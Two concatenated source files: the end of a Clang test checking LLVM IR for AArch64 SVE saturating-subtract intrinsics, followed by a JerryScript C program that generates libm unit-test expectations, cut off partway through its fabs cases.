@llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // svint8_t test_svqsub_n_s8_x(svbool_t pg, svint8_t op1, int8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s8_x'}} return SVE_ACLE_FUNC(svqsub,_n_s8,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s16_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s16_xu10__SVBool_tu11__SVInt16_ts( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // svint16_t test_svqsub_n_s16_x(svbool_t pg, svint16_t op1, int16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s16_x'}} return SVE_ACLE_FUNC(svqsub,_n_s16,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s32_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s32_xu10__SVBool_tu11__SVInt32_ti( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // svint32_t test_svqsub_n_s32_x(svbool_t pg, svint32_t op1, int32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s32_x'}} return SVE_ACLE_FUNC(svqsub,_n_s32,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s64_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s64_xu10__SVBool_tu11__SVInt64_tl( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // svint64_t test_svqsub_n_s64_x(svbool_t pg, svint64_t op1, int64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s64_x'}} return SVE_ACLE_FUNC(svqsub,_n_s64,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u8_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // // CPP-CHECK-LABEL: @_Z18test_svqsub_n_u8_xu10__SVBool_tu11__SVUint8_th( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // svuint8_t test_svqsub_n_u8_x(svbool_t pg, svuint8_t op1, uint8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u8_x'}} return SVE_ACLE_FUNC(svqsub,_n_u8,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u16_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u16_xu10__SVBool_tu12__SVUint16_tt( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // svuint16_t test_svqsub_n_u16_x(svbool_t pg, svuint16_t op1, uint16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u16_x'}} return SVE_ACLE_FUNC(svqsub,_n_u16,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u32_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u32_xu10__SVBool_tu12__SVUint32_tj( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // svuint32_t test_svqsub_n_u32_x(svbool_t pg, svuint32_t op1, uint32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u32_x'}} return SVE_ACLE_FUNC(svqsub,_n_u32,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u64_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u64_xu10__SVBool_tu12__SVUint64_tm( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // svuint64_t test_svqsub_n_u64_x(svbool_t pg, svuint64_t op1, uint64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u64_x'}} return SVE_ACLE_FUNC(svqsub,_n_u64,_x,)(pg, op1, op2); }
866812.c
/* Copyright JS Foundation and other contributors, http://js.foundation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /* * Unit test generator for jerry-libm. * To be compiled separately from the rest of jerry and to be linked to a trusted libm. * Its output should be redirected to test-libm.inc.h. * * Example: * gcc gen-test-libm.c -o gen-test-libm -lm * ./gen-test-libm >test-libm.inc.h */ #include <math.h> #include <stdio.h> #define GEN_INT_TEST(EXPR) printf("check_int (\"%s\", %s, %d);\n", #EXPR, #EXPR, EXPR); #define GEN_DBL_TEST(EXPR) printf("check_double (\"%s\", %s, %.20E);\n", #EXPR, #EXPR, EXPR); int main (int argc, char **args) { printf ("/* Copyright JS Foundation and other contributors, http://js.foundation\n" " *\n" " * Licensed under the Apache License, Version 2.0 (the \"License\");\n" " * you may not use this file except in compliance with the License.\n" " * You may obtain a copy of the License at\n" " *\n" " * http://www.apache.org/licenses/LICENSE-2.0\n" " *\n" " * Unless required by applicable law or agreed to in writing, software\n" " * distributed under the License is distributed on an \"AS IS\" BASIS\n" " * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n" " * See the License for the specific language governing permissions and\n" " * limitations under the License.\n" " */\n" "\n" "/* This file is automatically generated by the gen-test-libm.sh script.\n" " * Do not edit! */\n" "\n"); /* acos tests */ GEN_DBL_TEST (acos (0.0)); GEN_DBL_TEST (acos (-0.0)); GEN_DBL_TEST (acos (1.0)); GEN_DBL_TEST (acos (-1.0)); GEN_DBL_TEST (acos (0.5)); GEN_DBL_TEST (acos (-0.5)); GEN_DBL_TEST (acos (INFINITY)); GEN_DBL_TEST (acos (-INFINITY)); GEN_DBL_TEST (acos (NAN)); GEN_DBL_TEST (acos (6.9e-18)); GEN_DBL_TEST (acos (-6.9e-18)); GEN_DBL_TEST (acos (7.0e-18)); GEN_DBL_TEST (acos (-7.0e-18)); GEN_DBL_TEST (acos (7.4e-9)); GEN_DBL_TEST (acos (-7.4e-9)); GEN_DBL_TEST (acos (7.5e-9)); GEN_DBL_TEST (acos (-7.5e-9)); GEN_DBL_TEST (acos (0.1)); GEN_DBL_TEST (acos (-0.1)); GEN_DBL_TEST (acos (0.4)); GEN_DBL_TEST (acos (-0.4)); GEN_DBL_TEST (acos (0.6)); GEN_DBL_TEST (acos (-0.6)); GEN_DBL_TEST (acos (0.99)); GEN_DBL_TEST (acos (-0.99)); GEN_DBL_TEST (acos (1.1)); GEN_DBL_TEST (acos (-1.1)); GEN_DBL_TEST (acos (0.7)); /* asin tests*/ GEN_DBL_TEST (asin (0.0)); GEN_DBL_TEST (asin (-0.0)); GEN_DBL_TEST (asin (1.0)); GEN_DBL_TEST (asin (-1.0)); GEN_DBL_TEST (asin (0.5)); GEN_DBL_TEST (asin (-0.5)); GEN_DBL_TEST (asin (0.98)); GEN_DBL_TEST (asin (-0.98)); GEN_DBL_TEST (asin (INFINITY)); GEN_DBL_TEST (asin (-INFINITY)); GEN_DBL_TEST (asin (NAN)); GEN_DBL_TEST (asin (6.9e-18)); GEN_DBL_TEST (asin (-6.9e-18)); GEN_DBL_TEST (asin (7.0e-18)); GEN_DBL_TEST (asin (-7.0e-18)); GEN_DBL_TEST (asin (7.4e-9)); GEN_DBL_TEST (asin (-7.4e-9)); GEN_DBL_TEST (asin (7.5e-9)); GEN_DBL_TEST (asin (-7.5e-9)); GEN_DBL_TEST (asin (0.1)); GEN_DBL_TEST (asin (-0.1)); GEN_DBL_TEST (asin (0.4)); GEN_DBL_TEST (asin (-0.4)); GEN_DBL_TEST (asin (0.6)); GEN_DBL_TEST (asin (-0.6)); GEN_DBL_TEST (asin (0.97)); GEN_DBL_TEST (asin (-0.97)); GEN_DBL_TEST (asin (0.99)); GEN_DBL_TEST (asin (-0.99)); GEN_DBL_TEST (asin (1.1)); GEN_DBL_TEST (asin (-1.1)); GEN_DBL_TEST (asin (0.7)); /* atan tests*/ GEN_DBL_TEST (atan (0.0)); GEN_DBL_TEST (atan (-0.0)); GEN_DBL_TEST (atan (7.0 / 16.0)); GEN_DBL_TEST (atan (-7.0 / 16.0)); GEN_DBL_TEST (atan (11.0 / 16.0)); GEN_DBL_TEST (atan (-11.0 / 16.0)); GEN_DBL_TEST (atan (19.0 / 16.0)); GEN_DBL_TEST (atan (-19.0 / 16.0)); GEN_DBL_TEST (atan (39.0 / 16.0)); GEN_DBL_TEST (atan (-39.0 / 16.0)); GEN_DBL_TEST (atan (1.0)); GEN_DBL_TEST (atan (-1.0)); GEN_DBL_TEST (atan (INFINITY)); GEN_DBL_TEST (atan (-INFINITY)); GEN_DBL_TEST (atan (NAN)); GEN_DBL_TEST (atan (6.9 / 16.0)); GEN_DBL_TEST (atan (-6.9 / 16.0)); GEN_DBL_TEST (atan (7.1 / 16.0)); GEN_DBL_TEST (atan (-7.1 / 16.0)); GEN_DBL_TEST (atan (10.9 / 16.0)); GEN_DBL_TEST (atan (-10.9 / 16.0)); GEN_DBL_TEST (atan (11.1 / 16.0)); GEN_DBL_TEST (atan (-11.1 / 16.0)); GEN_DBL_TEST (atan (18.9 / 16.0)); GEN_DBL_TEST (atan (-18.9 / 16.0)); GEN_DBL_TEST (atan (19.1 / 16.0)); GEN_DBL_TEST (atan (-19.1 / 16.0)); GEN_DBL_TEST (atan (38.9 / 16.0)); GEN_DBL_TEST (atan (-38.9 / 16.0)); GEN_DBL_TEST (atan (39.1 / 16.0)); GEN_DBL_TEST (atan (-39.1 / 16.0)); GEN_DBL_TEST (atan (0.99)); GEN_DBL_TEST (atan (-0.99)); GEN_DBL_TEST (atan (1.1)); GEN_DBL_TEST (atan (-1.1)); GEN_DBL_TEST (atan (7.37e+19)); GEN_DBL_TEST (atan (-7.37e+19)); GEN_DBL_TEST (atan (7.38e+19)); GEN_DBL_TEST (atan (-7.38e+19)); GEN_DBL_TEST (atan (0.7)); /* atan2 tests*/ GEN_DBL_TEST (atan2 (NAN, NAN)); GEN_DBL_TEST (atan2 (0.0, NAN)); GEN_DBL_TEST (atan2 (-0.0, NAN)); GEN_DBL_TEST (atan2 (1.0, NAN)); GEN_DBL_TEST (atan2 (-1.0, NAN)); GEN_DBL_TEST (atan2 (INFINITY, NAN)); GEN_DBL_TEST (atan2 (-INFINITY, NAN)); GEN_DBL_TEST (atan2 (NAN, 0.0)); GEN_DBL_TEST (atan2 (NAN, -0.0)); GEN_DBL_TEST (atan2 (NAN, 1.0)); GEN_DBL_TEST (atan2 (NAN, -1.0)); GEN_DBL_TEST (atan2 (NAN, INFINITY)); GEN_DBL_TEST (atan2 (NAN, -INFINITY)); GEN_DBL_TEST (atan2 (0.0, 0.0)); GEN_DBL_TEST (atan2 (0.0, -0.0)); GEN_DBL_TEST (atan2 (-0.0, 0.0)); GEN_DBL_TEST (atan2 (-0.0, -0.0)); GEN_DBL_TEST (atan2 (0.0, 1.0)); GEN_DBL_TEST (atan2 (0.0, -1.0)); GEN_DBL_TEST (atan2 (0.0, INFINITY)); GEN_DBL_TEST (atan2 (0.0, -INFINITY)); GEN_DBL_TEST (atan2 (-0.0, 1.0)); GEN_DBL_TEST (atan2 (-0.0, -1.0)); GEN_DBL_TEST (atan2 (-0.0, INFINITY)); GEN_DBL_TEST (atan2 (-0.0, -INFINITY)); GEN_DBL_TEST (atan2 (1.0, 0.0)); GEN_DBL_TEST (atan2 (1.0, -0.0)); GEN_DBL_TEST (atan2 (INFINITY, 0.0)); GEN_DBL_TEST (atan2 (INFINITY, -0.0)); GEN_DBL_TEST (atan2 (-1.0, 0.0)); GEN_DBL_TEST (atan2 (-1.0, -0.0)); GEN_DBL_TEST (atan2 (-INFINITY, 0.0)); GEN_DBL_TEST (atan2 (-INFINITY, -0.0)); GEN_DBL_TEST (atan2 (1.0, INFINITY)); GEN_DBL_TEST (atan2 (-1.0, INFINITY)); GEN_DBL_TEST (atan2 (1.0, -INFINITY)); GEN_DBL_TEST (atan2 (-1.0, -INFINITY)); GEN_DBL_TEST (atan2 (INFINITY, INFINITY)); GEN_DBL_TEST (atan2 (INFINITY, -INFINITY)); GEN_DBL_TEST (atan2 (-INFINITY, INFINITY)); GEN_DBL_TEST (atan2 (-INFINITY, -INFINITY)); GEN_DBL_TEST (atan2 (INFINITY, 1.0)); GEN_DBL_TEST (atan2 (INFINITY, -1.0)); GEN_DBL_TEST (atan2 (-INFINITY, 1.0)); GEN_DBL_TEST (atan2 (-INFINITY, -1.0)); GEN_DBL_TEST (atan2 (0.7, 1.0)); GEN_DBL_TEST (atan2 (-0.7, 1.0)); GEN_DBL_TEST (atan2 (0.7, -1.0)); GEN_DBL_TEST (atan2 (-0.7, -1.0)); GEN_DBL_TEST (atan2 (0.4, 0.0003)); GEN_DBL_TEST (atan2 (1.4, -0.93)); /* ceil tests */ GEN_DBL_TEST (ceil (0.0)); GEN_DBL_TEST (ceil (-0.0)); GEN_DBL_TEST (ceil (INFINITY)); GEN_DBL_TEST (ceil (-INFINITY)); GEN_DBL_TEST (ceil (NAN)); GEN_DBL_TEST (ceil (3.14)); GEN_DBL_TEST (ceil (-3.14)); GEN_DBL_TEST (ceil (3.72e-09)); GEN_DBL_TEST (ceil (-3.72e-09)); GEN_DBL_TEST (ceil (7.37e+19)); GEN_DBL_TEST (ceil (-7.37e+19)); /* copysign tests */ /* SKIPPED: not publicly declared in jerry-libm GEN_DBL_TEST (copysign (0.0, 0.0)); GEN_DBL_TEST (copysign (0.0, -0.0)); GEN_DBL_TEST (copysign (-0.0, 0.0)); GEN_DBL_TEST (copysign (-0.0, -0.0)); GEN_DBL_TEST (copysign (0.0, 1.0)); GEN_DBL_TEST (copysign (0.0, -1.0)); GEN_DBL_TEST (copysign (-0.0, 1.0)); GEN_DBL_TEST (copysign (-0.0, -1.0)); GEN_DBL_TEST (copysign (0.0, INFINITY)); GEN_DBL_TEST (copysign (0.0, -INFINITY)); GEN_DBL_TEST (copysign (-0.0, INFINITY)); GEN_DBL_TEST (copysign (-0.0, -INFINITY)); GEN_DBL_TEST (copysign (0.0, NAN)); GEN_DBL_TEST (copysign (-0.0, NAN)); GEN_DBL_TEST (copysign (1.0, 0.0)); GEN_DBL_TEST (copysign (1.0, -0.0)); GEN_DBL_TEST (copysign (-1.0, 0.0)); GEN_DBL_TEST (copysign (-1.0, -0.0)); GEN_DBL_TEST (copysign (1.0, 1.0)); GEN_DBL_TEST (copysign (1.0, -1.0)); GEN_DBL_TEST (copysign (-1.0, 1.0)); GEN_DBL_TEST (copysign (-1.0, -1.0)); GEN_DBL_TEST (copysign (1.0, INFINITY)); GEN_DBL_TEST (copysign (1.0, -INFINITY)); GEN_DBL_TEST (copysign (-1.0, INFINITY)); GEN_DBL_TEST (copysign (-1.0, -INFINITY)); GEN_DBL_TEST (copysign (1.0, NAN)); GEN_DBL_TEST (copysign (-1.0, NAN)); GEN_DBL_TEST (copysign (INFINITY, 0.0)); GEN_DBL_TEST (copysign (INFINITY, -0.0)); GEN_DBL_TEST (copysign (-INFINITY, 0.0)); GEN_DBL_TEST (copysign (-INFINITY, -0.0)); GEN_DBL_TEST (copysign (INFINITY, 1.0)); GEN_DBL_TEST (copysign (INFINITY, -1.0)); GEN_DBL_TEST (copysign (-INFINITY, 1.0)); GEN_DBL_TEST (copysign (-INFINITY, -1.0)); GEN_DBL_TEST (copysign (INFINITY, INFINITY)); GEN_DBL_TEST (copysign (INFINITY, -INFINITY)); GEN_DBL_TEST (copysign (-INFINITY, INFINITY)); GEN_DBL_TEST (copysign (-INFINITY, -INFINITY)); GEN_DBL_TEST (copysign (INFINITY, NAN)); GEN_DBL_TEST (copysign (-INFINITY, NAN)); GEN_DBL_TEST (copysign (NAN, 0.0)); GEN_DBL_TEST (copysign (NAN, -0.0)); GEN_DBL_TEST (copysign (NAN, 1.0)); GEN_DBL_TEST (copysign (NAN, -1.0)); GEN_DBL_TEST (copysign (NAN, INFINITY)); GEN_DBL_TEST (copysign (NAN, -INFINITY)); GEN_DBL_TEST (copysign (NAN, NAN)); GEN_DBL_TEST (copysign (3.14, -1.0)); GEN_DBL_TEST (copysign (-3.14, 1.0)); GEN_DBL_TEST (copysign (1.0, -3.14)); GEN_DBL_TEST (copysign (-1.0, 3.14)); */ /* exp tests */ GEN_DBL_TEST (exp (0.0)); GEN_DBL_TEST (exp (-0.0)); GEN_DBL_TEST (exp (1.0)); GEN_DBL_TEST (exp (-1.0)); GEN_DBL_TEST (exp (INFINITY)); GEN_DBL_TEST (exp (-INFINITY)); GEN_DBL_TEST (exp (NAN)); GEN_DBL_TEST (exp (7.08e+02)); GEN_DBL_TEST (exp (7.10e+02)); GEN_DBL_TEST (exp (-7.40e+02)); GEN_DBL_TEST (exp (-7.50e+02)); GEN_DBL_TEST (exp (0.34)); GEN_DBL_TEST (exp (-0.34)); GEN_DBL_TEST (exp (0.35)); GEN_DBL_TEST (exp (-0.35)); GEN_DBL_TEST (exp (1.03)); GEN_DBL_TEST (exp (-1.03)); GEN_DBL_TEST (exp (1.04)); GEN_DBL_TEST (exp (-1.04)); GEN_DBL_TEST (exp (3.72e-09)); GEN_DBL_TEST (exp (-3.72e-09)); GEN_DBL_TEST (exp (3.73e-09)); GEN_DBL_TEST (exp (-3.73e-09)); GEN_DBL_TEST (exp (2.0)); GEN_DBL_TEST (exp (3.0)); GEN_DBL_TEST (exp (0.7)); GEN_DBL_TEST (exp (38.0)); /* fabs tests */ GEN_DBL_TEST (fabs (0.0)); GEN_DBL_TEST (fabs (-0.0)); GEN_DBL_TEST (fabs (1.0)); GEN_DBL_TEST (fabs (-1.0)); GEN_DBL_TEST (fabs (INFINITY)); GEN_DBL_TEST (fabs (-INFINITY)); GEN_DBL_TEST (fabs (NAN)); GEN_DBL_TEST (fabs (3.14)); GEN_DBL_TEST (fabs (-3.14)); GEN_DBL_TEST (fabs (0.7)); GEN_DBL_TEST (fabs (-0.7)); GEN_DBL_TEST (fabs (3.72e-09)); GEN_DBL_TEST (fabs (-3.72e-09)); GEN_DBL_TEST (fabs (7.37e+19)); 